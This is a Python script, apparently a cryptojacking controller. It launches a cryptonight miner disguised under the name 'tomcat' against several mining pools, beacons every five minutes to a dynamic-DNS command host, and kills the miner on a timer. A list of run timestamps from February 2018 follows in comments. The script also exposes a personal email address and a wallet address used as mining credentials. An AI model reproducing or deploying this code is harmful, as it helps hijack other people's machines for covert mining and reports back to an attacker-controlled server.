import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:33:06.310704
#2018-02-17 16:19:06.029035
#2018-02-17 18:07:04.098249
#2018-02-17 19:54:03.674043
#2018-02-17 21:43:02.247200
#2018-02-17 23:26:07.161731
#2018-02-18 01:16:05.222380
#2018-02-18 03:03:06.148929
#2018-02-18 04:52:06.074881
#2018-02-18 06:44:03.816100
#2018-02-18 08:33:01.662924
#2018-02-18 10:20:06.429602
#2018-02-18 12:06:04.608987
#2018-02-18 13:50:07.515863
#2018-02-18 15:40:04.463022
#2018-02-18 17:29:03.495798
#2018-02-18 19:17:04.917757
#2018-02-18 21:03:07.310392
#2018-02-18 22:49:05.378973
#2018-02-19 00:38:05.638954
#2018-02-19 02:25:04.192664
#2018-02-19 04:12:01.367141
#2018-02-19 05:56:01.425141
#2018-02-19 07:44:06.719727
#2018-02-19 09:33:03.771469
#2018-02-19 11:23:06.891385
#2018-02-19 13:10:08.668490
#2018-02-19 14:59:07.887847
#2018-02-19 16:47:10.348658
#2018-02-19 18:33:07.528919
#2018-02-19 20:18:05.866707
#2018-02-19 22:06:07.943143
#2018-02-19 23:53:01.629951
#2018-02-20 01:41:08.177699
#2018-02-20 03:29:02.172409
#2018-02-20 05:16:06.512032
#2018-02-20 06:58:01.886984
#2018-02-20 08:44:08.003664
#2018-02-20 10:28:01.966949
#2018-02-20 12:13:01.910004
#2018-02-20 14:00:11.046986
#2018-02-20 15:45:11.422302
#2018-02-20 17:33:07.406254
#2018-02-20 19:22:03.967356
#2018-02-20 21:10:08.247696
#2018-02-20 22:56:04.727824
#2018-02-21 00:39:05.677737
#2018-02-21 02:26:07.797758
#2018-02-21 04:12:09.563201
#2018-02-21 05:59:01.879934
#2018-02-21 07:48:05.655544
#2018-02-21 09:28:07.764727
#2018-02-21 11:17:02.079864
#2018-02-21 13:04:01.461105
#2018-02-21 14:51:12.480003
#2018-02-21 16:41:01.795239
#2018-02-21 18:29:12.292073
#2018-02-21 20:14:04.569862
#2018-02-21 22:01:07.849710
#2018-02-21 23:48:04.064319
#2018-02-22 01:39:07.893471
#2018-02-22 03:28:05.576172
#2018-02-22 05:15:04.551296
#2018-02-22 06:58:06.833215
#2018-02-22 08:47:01.534452
#2018-02-22 10:34:07.707807
#2018-02-22 12:21:07.848912
#2018-02-22 14:04:09.225483
#2018-02-22 15:52:02.050839
#2018-02-22 17:40:12.768670
#2018-02-22 19:27:01.663068
#2018-02-22 21:19:01.755352
#2018-02-22 23:04:01.406252
#2018-02-23 00:52:01.893870
#2018-02-23 02:41:05.131118
#2018-02-23 04:31:01.834811
#2018-02-23 06:17:04.103756
#2018-02-23 08:05:07.663482
#2018-02-23 10:21:07.928828
#2018-02-23 12:16:07.949012
#2018-02-23 14:06:01.842557
#2018-02-23 15:56:05.896266
#2018-02-23 17:43:05.235912
#2018-02-23 19:31:05.494455
#2018-02-23 21:14:06.467022
#2018-02-23 23:02:07.784517
#2018-02-24 00:48:03.647169
#2018-02-24 02:39:01.527420
#2018-02-24 04:33:04.510405
#2018-02-24 06:17:06.014590
#2018-02-24 08:05:06.676007
#2018-02-24 09:49:03.882633
#2018-02-24 11:44:04.149530
#2018-02-24 13:35:08.728056
#2018-02-24 15:23:04.696339
#2018-02-24 17:12:06.347691
#2018-02-24 19:04:02.156670
#2018-02-24 20:52:01.388561
#2018-02-24 23:18:01.675725
#2018-02-25 03:22:04.621196
#2018-02-25 06:49:07.311809